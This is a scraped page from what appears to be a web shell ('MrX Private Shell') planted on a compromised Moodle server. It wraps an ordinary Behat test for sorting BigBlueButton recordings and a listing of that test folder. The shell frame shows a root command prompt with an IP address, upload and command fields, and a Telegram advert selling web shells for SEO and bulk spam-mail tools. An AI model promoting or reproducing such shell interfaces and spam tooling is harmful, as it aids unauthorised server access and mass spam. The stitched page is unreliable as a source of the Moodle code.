__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.216.45: ~ $
@mod @mod_bigbluebuttonbn @core_form @course
Feature: The recording can be managed through the room page and as a user I can interact with the table

  Background:  Make sure that import recording is enabled and course, activities and recording exists
    Given a BigBlueButton mock server is configured
    And I enable "bigbluebuttonbn" "mod" plugin
    And the following "courses" exist:
      | fullname      | shortname | category |
      | Test Course 1 | C1        | 0        |
    And the following "users" exist:
      | username | firstname | lastname | email             |
      | user1    | User      | 1        | user1@example.com |
    And the following "activities" exist:
      | activity        | name           | intro                           | course | idnumber         | type | recordings_imported |
      | bigbluebuttonbn | RoomRecordings | Test Room Recording description | C1     | bigbluebuttonbn1 | 0    | 0                   |
    And the following "mod_bigbluebuttonbn > meeting" exists:
      | activity | RoomRecordings |
    And the following "mod_bigbluebuttonbn > recordings" exist:
      | bigbluebuttonbn | name        | description   | status | starttime |
      | RoomRecordings  | Recording 1 | Description 1 | 2      | 1619666194  |
      | RoomRecordings  | Recording 2 | Description 2 | 2      | 1639668194  |
      | RoomRecordings  | Recording 3 | Description 3 | 2      | 1629666194  |
      | RoomRecordings  | Recording 4 | Description 4 | 2      | 1649666194  |

  @javascript
  Scenario: Recording should be sortable by date
    Given I am on the "RoomRecordings" "bigbluebuttonbn activity" page logged in as admin
    When I click on "th[data-yui3-col-id='date'] .yui3-datatable-sort-indicator" "css_element"
    And "Recording 1" "text" should appear before "Recording 3" "text"
    And "Recording 3" "text" should appear before "Recording 2" "text"
    And "Recording 2" "text" should appear before "Recording 4" "text"
    And I click on "th[data-yui3-col-id='date'] .yui3-datatable-sort-indicator" "css_element"
    Then "Recording 1" "text" should appear after "Recording 3" "text"
    And "Recording 3" "text" should appear after "Recording 2" "text"
    And "Recording 2" "text" should appear after "Recording 4" "text"

Filemanager

Name Type Size Permission Actions
fixtures Folder 0755
add_instance.feature File 2.57 KB 0644
add_instance_in_empty_state.feature File 2.36 KB 0644
behat_mod_bigbluebuttonbn.php File 10.28 KB 0644
bigbluebuttonbn_activity_availability.feature File 2.31 KB 0644
completion.feature File 3.48 KB 0644
edit_instance.feature File 3.06 KB 0644
end_meeting.feature File 4.45 KB 0644
group_mode.feature File 7.95 KB 0644
guest_access.feature File 4.28 KB 0644
join_meeting.feature File 2.97 KB 0644
join_meeting_as_guest.feature File 2.4 KB 0644
lock_settings.feature File 2.99 KB 0644
meeting_roles.feature File 1.78 KB 0644
recordings.feature File 3.85 KB 0644
recordings_import.feature File 6.96 KB 0644
roles.feature File 1.11 KB 0644
room.feature File 2.22 KB 0644
start_meeting.feature File 4.41 KB 0644
subplugins.feature File 5.99 KB 0644
view_presentation.feature File 2.96 KB 0644
Filemanager